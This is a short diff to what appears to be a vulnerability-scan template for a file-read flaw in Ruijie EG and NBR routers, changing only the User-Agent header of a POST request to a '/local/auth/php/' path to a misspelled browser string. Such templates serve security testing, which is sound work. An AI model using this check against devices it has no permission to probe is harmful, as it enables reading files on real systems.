--- a/webdev/锐捷/ruijie-eg-and-nbr-local-auth-php-fileread.yaml
+++ b/webdev/锐捷/ruijie-eg-and-nbr-local-auth-php-fileread.yaml
@@ -18,7 +18,7 @@ http:
       - |
         POST /local/auth/php/{{path}} HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+        User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
         Content-Type: application/x-www-form-urlencoded
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
         Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
